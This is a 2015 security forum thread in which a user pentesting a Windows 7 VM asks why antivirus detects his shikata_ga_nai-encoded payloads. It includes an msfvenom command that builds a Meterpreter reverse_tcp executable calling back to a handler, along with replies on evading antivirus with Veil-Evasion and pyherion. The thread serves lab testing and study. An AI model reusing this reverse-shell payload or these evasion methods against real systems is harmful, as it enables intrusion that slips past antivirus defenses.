Hadeus Posted March 27, 2015
I've been pentesting on my Windows 7 VM lately with shikata_ga_nai encoded payloads I've been generating via Veil-Evasion and msfvenom. For example, I have been using the windows/meterpreter/reverse_tcp reverse stager to call back to my handler on Kali, and it works, BUT that's only when AV is turned off; otherwise my payloads are detected by AV (AVG). Are shikata_ga_nai signatures now detectable via AV? Or perhaps I'm encoding my payloads wrong? Here is an example of one of my payloads:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe LHOST=192.168.32.130 LPORT=4444 > Kittens.exe
dustbyter Posted March 27, 2015
Yeah, I'm pretty sure that most A/V will detect shikata_ga_nai. This method has been around for some time. You can try to run the payload through several encoders to evade A/V, but that is not guaranteed either. Good luck with it!
i8igmac Posted March 27, 2015
It was really cool back when it was fully undetectable... it's a shame they went public... Research other ways of
ZaraByte Posted March 28, 2015
I currently have a video I finished on using Veil Framework. I just need to spend some time adding the voice-over to go with the video; I never got around to it. I was messing around with my old microphone to see if it would be good to use now or not, and I didn't like how the audio turned out, so I gotta redo it. However, I have an old video that I did using Veil Framework. The reason I'm doing the video over again is because I pronounced "Veil Framework" wrong through the whole video, so I sounded like a complete idiot. https://www.youtube.com/watch?v=9E5RbzsnJAo
Hadeus (Author) Posted March 29, 2015
@ZaraByte Nice video, btw! So I decided to use pyherion (through Veil-Evasion) on my payloads. It showed up as FUD on the AVG scan.
Xcellerator Posted April 2, 2015
I'd recommend you read this: http://schierlm.users.sourceforge.net/avevasion.html
Very good article on how the encoders work and what does and doesn't bypass AV evasion. When it comes to binaries, it basically boils down to writing your own code.